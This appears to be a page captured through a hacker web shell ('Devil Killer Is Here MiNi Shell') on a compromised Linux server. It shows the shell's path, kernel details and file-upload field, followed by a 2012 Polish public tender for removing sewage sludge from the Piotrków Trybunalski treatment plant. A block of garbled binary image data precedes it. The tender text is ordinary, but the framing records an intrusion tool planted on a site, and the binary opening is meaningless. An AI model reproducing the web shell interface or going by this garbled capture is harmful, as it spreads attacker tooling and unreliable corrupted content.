JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/461548-N-2012.html

<p class="kh_header"><b>Piotrków Trybunalski: SUKCESYWNY WYWÓZ I ZAGOSPODAROWANIE  ODPADÓW ZAKLASYFIKOWANYCH KODAMI:
- 19 08 05 - USTABILIZOWANE KOMUNALNE OSADY ŚCIEKOWE,
- 19 08 99 - INNE NIEWYMIENIONE ODPADY,
- ex 19 05 03 -  MATERIAŁ PO PROCESIE KOMPOSTOWANIA
Z OCZYSZCZALNI ŚCIEKÓW W PIOTRKOWIE TRYBUNALSKIM, UL. PODOLE 7/9</b><br>
<b>Numer ogłoszenia: 461548 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Piotrkowskie Wodociągi i Kanalizacja Sp z o.o. , ul. Przemysłowa 4, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 646 15 66, faks 44 646 15 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwik.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa handlowego ze 100% udziałem Miasta Piotrków Trybunalski.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNY WYWÓZ I ZAGOSPODAROWANIE  ODPADÓW ZAKLASYFIKOWANYCH KODAMI:
- 19 08 05 - USTABILIZOWANE KOMUNALNE OSADY ŚCIEKOWE,
- 19 08 99 - INNE NIEWYMIENIONE ODPADY,
- ex 19 05 03 -  MATERIAŁ PO PROCESIE KOMPOSTOWANIA
Z OCZYSZCZALNI ŚCIEKÓW W PIOTRKOWIE TRYBUNALSKIM, UL. PODOLE 7/9.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywny wywóz i zagospodarowanie odpadów zaklasyfikowanych kodami: 
- 19 08 05 - ustabilizowane komunalne osady ściekowe,
- 19 08 99 - inne niewymienione odpady,
- ex 19 05 03 -  materiał po procesie kompostowania z Oczyszczalni Ścieków 
w Piotrkowie Trybunalskim, ul. Podole 7/9.
2. Sukcesywny wywóz i zagospodarowanie w ramach odzysku lub unieszkodliwienia:
1) odpadu o kodzie 19 08 05 ustabilizowane komunalne osady  ściekowe w ilości do 8 000 Mg,
2) odpadu o kodzie 19 08 99  inne niewymienione odpady w ilości do 500 Mg,
3) odpadu  o kodzie  ex 19 05 03  materiał po procesie kompostowania  w ilości do  500 Mg.   
3. Zamawiający dopuszcza możliwość zwiększenia zamówienia do 20% w stosunku do wartości zamówienia określonej w pkt 2, a Wykonawca zobowiązuje się wywieźć  i zagospodarować przedmiot umowy po cenach ustalonych w formularzu oferty.  
4. Odpady będące przedmiotem zagospodarowania pochodzą z procesów oczyszczania ścieków komunalnych w Oczyszczalni Ścieków dla m. Piotrkowa Trybunalskiego. 
5. Odpad o kodzie 19 08 05 - ustabilizowane komunalne osady  ściekowe, poddawane są badaniom  z częstotliwością i w zakresie, zgodnym z rozporządzeniem Ministra Środowiska w sprawie komunalnych osadów ściekowych - Dz.U. z 2010 nr 137 poz. 924. 
Do specyfikacji dołączono wyniki badań osadu.
OBOWIĄZKI WYKONAWCY:
1. Wykonawca zobowiązany jest przedstawić zezwolenie na prowadzenie odzysku, bądź unieszkodliwiania przedmiotowych odpadów. 
2. W zezwoleniu muszą być określone elementy wyszczególnione w art. 27,  ust. 2 ustawy o odpadach, tj.:          
1) rodzaj i ilość odpadów przewidywanych do odzysku lub unieszkodliwiania okresie roku,
2) miejsce i dopuszczone metody odzysku lub unieszkodliwiania odpadów, 
3) dodatkowe warunki prowadzenia działalności w zakresie odzysku lub unieszkodliwiania odpadów, jeżeli wymaga tego specyfika odpadów, potrzeba zachowania wymagań ochrony życia, zdrowia ludzi lub ochrony środowiska, 
4) miejsce i sposób magazynowania odpadów, 
5) czas obowiązywania zezwolenia.
3. Wykonawca przed złożeniem oferty powinien zapoznać się z warunkami technicznymi i przestrzennymi odbioru odpadów, dokonać wizji lokalnej na terenie Oczyszczalni Ścieków.
4. Wykonawca jest zobowiązany do przestrzegania zasady bliskości, zgodnie z art. 9 ustawy o odpadach.
5. W ofercie należy podać metodę zagospodarowania odpadów z określeniem lokalizacji jej wykonywania, czyli:
1) w przypadku odzysku - jaką metodą i gdzie znajduje się instalacja,
2) w przypadku unieszkodliwiania - jaką metodą i gdzie zlokalizowana jest instalacja.
6. Odpady o kodach 19 08 99 i ex 19 05 03  nie mogą być stosowane w rolnictwie i do rekultywacji gruntów na cele rolne.
7. Dopuszcza się metodę odzysku komunalnych osadów ściekowych polegającą na ich stosowaniu:
7.1. Do dostosowania gruntów do określonych potrzeb wynikających z planów gospodarki odpadami, planów zagospodarowania przestrzennego lub decyzji 
o warunkach zabudowy  i zagospodarowania terenu.
7.2. Do uprawy roślin przeznaczonych do produkcji kompostu.
7.3. Do uprawy roślin nieprzeznaczonych do spożycia i do produkcji pasz.
8. W przypadku zastosowania metody odzysku określonej w pkt 7.1. - Właściciel, dzierżawca lub inna osoba władająca nieruchomością, na której komunalne osady ściekowe mają zostać zastosowane musi posiadać zezwolenie na prowadzenie działalności odzysku.
9.W przypadku zastosowania metody określonej w punkcie 7.2. i 7.3 Wykonawca musi wykazać możliwość zagospodarowania osadów, zgodnie z przepisami. Miejsce zbierania, odzysku lub unieszkodliwiania musi być zlokalizowane na terenie województwa łódzkiego (obowiązuje zasada zachowania  bliskości).
10. W przypadku metod odzysku określonych w pkt 7 Wykonawca będzie musiał wykonywać badania gruntów, na których będą stosowane komunalne osady ściekowe, a na podstawie badań gruntu  i dostarczonych przez Zamawiającego badań komunalnych osadów ściekowych ustalić dawkę osadu, jaką można zastosować na poszczególnych gruntach.
11. W przypadku wywozu odpadów do kompostowni Wykonawca zobowiązany jest przedstawić umowę z kompostownią na przyjmowanie przedmiotowych odpadów z określoną ilością odpadów przeznaczonych do kompostowania, w której integralną częścią jest decyzja kompostowni na odzysk metodą R3.
12. W przypadku wywozu odpadów w celu rekultywacji na składowisko, Wykonawca zobowiązany jest przedstawić umowę  podpisaną z eksploatatorem składowiska na zastosowanie przedmiotowych odpadów do rekultywacji w/w składowiska z określeniem ilości  odpadów, w której integralną częścią jest decyzja składowiska na rekultywację.
13. Wykonawca jest zobowiązany przedstawić oświadczenie o planowanym sposobie odzysku, bądź unieszkodliwiania przedmiotowych odpadów, zgodne z posiadaną decyzją na odzysk lub unieszkodliwianie odpadów (złożone oświadczenie musi być spójne z  przedstawioną decyzją).
14. Wykonawca przejmuje pełną odpowiedzialność za gospodarowanie przedmiotowymi odpadami. Odpowiedzialność ta rozpoczyna się od momentu załadunku odpadów na środki transportowe w miejscu gromadzenia odpadów na terenie oczyszczalni.
15. Wykonawca zobowiązany jest przedstawić zezwolenie na transport komunalnych  odpadów wydane na podstawie ustawy o odpadach  z dnia 27 kwietnia 2001 r. (Dz.U. z 2010 r. Nr 185 poz. 1243 z póź. zm.). 
16.  Wykonawca zobowiązany jest zapewnić szczelny, zabezpieczony przez wypadaniem i niekorzystnym działaniem warunków atmosferycznych transport odpadów.
17. Wykonawca zobowiązany jest do zapoznania się i przestrzegania zasad bezpieczeństwa 
i higieny pracy obowiązujących na terenie będącym własnością Zamawiającego, co potwierdzone zostanie podpisaniem stosownego dokumentu przed wykonaniem usługi.
18. Przed przystąpieniem do wywozu odpadów Wykonawca zobowiązany jest:         1) powiadomić Zamawiającego, z co najmniej 3-dniowym wyprzedzeniem, o terminie rozpoczęcia wywozu odpadów,
2) przedstawić listę pojazdów z podaniem dla każdego zestawu ciągnik siodłowy i naczepy,
3) przedstawić nr rejestracyjne dla każdego ciągnika siodłowego  i naczepy.
19.  Każdy pojazd Wykonawcy wywożący odpad z terenu Oczyszczalni Ścieków zostanie zaewidencjonowany w zestawieniu Służb Ochrony Zakładu i potwierdzony pisemnie, przez pracownika Ochrony i kierowcę Wykonawcę.
20. Zamawiający zastrzega sobie prowadzenie dodatkowo wyrywkowej kontroli ilości  wywożonych odpadów na niezależnej wadze. W przypadku rozbieżności między ilością ustaloną w oparciu o ilość łyżek ładowarki, a wagą  zostanie przeprowadzona weryfikacja.
21. W przypadku awarii ładowarki wznowienie ładowania odpadów może nastąpić po naprawie sprzętu. Awaria sprzętu nie stanowi podstawy do przedłużenia terminu realizacji wywozu.
22. Dopuszcza się miesięczne zestawienia ilości odpadów wywiezionych. Wykonawca  potwierdzać będzie zamawiającemu karty Przekazania Odpadu na koniec miesiąca.
23. Zamawiający ma prawo kontroli prawidłowości zagospodarowania przedmiotowych odpadów przez Wykonawcę.
24. Wykonawca zobowiązany jest do zagospodarowania odpadów, tj. przewozu do miejsc odzysku, bądź unieszkodliwiania i poddania odzyskowi lub unieszkodliwianiu z zachowaniem wymogów określonych przepisami ustawy z dnia 27-04-2001 r. o odpadach (Dz.U.  z 2010 r. Nr 185 poz. 1243 z póź. zm.).  oraz ustawy z dnia  27.04.2001 r.  Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150 z późn. zm.).
25. Przy realizacji zamówienia Wykonawca powinien:
1) przestrzegać ustawy z dnia 27-04-2001 roku o odpadach Dz.U.  z 2010 r. Nr 185 poz. 1243 z póź. zm.), 
2)  przestrzegać rozporządzenia Ministra Środowiska z dnia 13-07-2010 r. w sprawie komunalnych osadów ściekowych (Dz.U. z 2010 r. Nr 137, poz. 924),
3) przestrzegać ustawy Prawo ochrony środowiska z dnia 27-04-2001 r. (Dz.U. Nr 62, poz. 627  z późn. zm.),
4)  posiadać wymagane wszelkie decyzje i pozwolenia na transport, odbiór i zagospodarowanie osadów ściekowych.
Uwaga!
Dopuszcza się zmianę umowy o kwotę wynikającą ze zmienionych stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy.
3. OBOWIĄZKI ZAMAWIAJĄCEGO/WYTWÓRCY
Zamawiający przedstawi wyniki badań odpadów o kodzie 19 08 05, wykonane przez akredytowane laboratorium, zgodnie z załącznikiem nr 1 do umowy. 
Zamawiający przekaże  wyniki badań odpadów o kodzie ex 19 05 03 w terminie do 30-06-2013 r.
Zamawiający dokonywać będzie załadunku odpadów własnym lub wynajętym sprzętem  na specjalistyczne środki transportu Wykonawcy. Załadunek odpadów odbywać się będzie w dni robocze od poniedziałku do piątku  w  godzinach  700 do 1500.
Operator  ładowarki  będzie  prowadził rejestr zawierający: 
- nr rej pojazdu,
- czas rozpoczęcia i zakończenia załadunku pojazdu, 
- ilość i rodzaj załadowanego odpadu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.36.00-2, 90.51.37.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości  10 000 PLN
(słownie: dziesięć tysięcy złotych) do dnia 28-11-2012 r. do godz. 14:00.
2. Wykonawca wnosi wadium w jednej lub kilku następujących formach:
1) pieniądzu wpłaconym przelewem na rachunek bankowy: 
            Nr r-ku: 03 1440 1257 0000 0000 1084 1402

Uwaga: Na poleceniu przelewu należy zamieścić adnotację: Wadium - przetarg nieograniczony na: SUKCESYWNY WYWÓZ I ZAGOSPODAROWANIE  ODPADÓW ZAKLASYFIKOWANYCH KODAMI: 
- 19 08 05 - USTABILIZOWANE KOMUNALNE OSADY ŚCIEKOWE,
- 19 08 99 - INNE NIEWYMIENIONE ODPADY,
- ex 19 05 03 -  MATERIAŁ PO PROCESIE KOMPOSTOWANIA,
Z OCZYSZCZALNI ŚCIEKÓW  W PIOTRKOWIE TRYBUNALSKIM, UL. PODOLE 7/9.
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz.U.  z 2007 r., Nr 42 poz. 275 z późn. zm.).
3. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy wpłyną na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do sekretariatu  Zamawiającego, przed terminem składania ofert, a do oferty załączyć kserokopię.
Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony.
Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.
4. Zwrot wadium nastąpi zgodnie z przepisami art. 46 ust. 1, 1a, 2, 4 ustawy.
5. Zamawiający zatrzyma wniesione przez Wykonawcę wadium w przypadku zaistnienia okoliczności wskazanych w przepisach art. 46 ust. 4a oraz ust. 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dostarczy kopie ważnego zezwolenia od organu właściwego z uwagi na miejsce prowadzenia działalności - w zakresie odzysku lub unieszkodliwiania odpadów oraz transportu.
Wykonawca wskaże miejsce stosowania odpadów lub odzysku, bądź ich unieszkodliwiania, zgodne  z wymogami art. 9 ustawy o odpadach (Dz.U. z 2010 r. Nr 185 poz. 1243 
z póź. zm.).
W przypadku stosowania odpadów w gruncie, Wykonawca udokumentuje prawo do władania gruntami spełniającymi wymagania w/w ustawy o odpadach. W przypadku gdy stosowanie odpadów odbywać się będzie na gruntach dzierżawionych wymagane jest dostarczenie kopii umowy dzierżawy i pisemnej zgody właściciela dzierżawionego gruntu na stosowanie ustabilizowanych komunalnych przedmiotowych odpadów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże minimum 3 usługi odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj: za usługę potwierdzającą spełnianie tego warunku Zamawiający uzna wykonanie przez Wykonawcę usługi polegającej na wywozie i zagospodarowaniu przedmiotowych odpadów z oczyszczalni ścieków w ilości co najmniej 5000 Mg, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wg. załącznika nr 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponować  będzie specjalistycznym środkiem transportu dostosowanym do przewozu odpadów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku nastąpi w oparciu o przedłożoną przez Wykonawcę opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na min. 500 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie zawodowe - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PIOTRKOWSKIE WODOCIĄGI I KANALIZACJA SP. Z O.O.
UL. PRZEMYSŁOWA 4
97-300 PIOTRKÓW TRYBUNALSKI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 09:00, miejsce: PIOTRKOWSKIE WODOCIĄGI I KANALIZACJA SP. Z O.O.
UL. PRZEMYSŁOWA 4
97-300 PIOTRKÓW TRYBUNALSKI 
SEKRETARIAT.</p>
